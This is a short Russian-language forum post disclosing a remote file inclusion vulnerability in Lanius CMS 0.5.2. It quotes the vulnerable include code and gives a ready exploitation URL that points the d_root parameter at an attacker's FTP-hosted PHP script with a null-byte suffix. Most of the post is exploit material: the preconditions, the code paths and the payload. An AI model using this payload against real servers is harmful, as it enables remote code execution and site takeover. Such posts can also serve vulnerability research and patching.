16.11.2009, 22:37
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Lanius CMS version 0.5.2 RFI
Требования: register_globals= ON
allow_url_include = ON
Уязвимый код index.php:
PHP код:
...
require 'core.php';
include $d_root.'includes/header.php';
...
Смотрим в core.php:
PHP код:
...
if (!file_exists( $d_root.$d_private.'config.php' )) {
header( "Location: install/index.php" );
exit();
}
...
Эксплатация:
Код:
http://localhost/11/index.php?d_root=ftp://login:pass@host/script.php%00
Последний раз редактировалось Ins3t; 16.11.2009 в 22:59..
|
|
|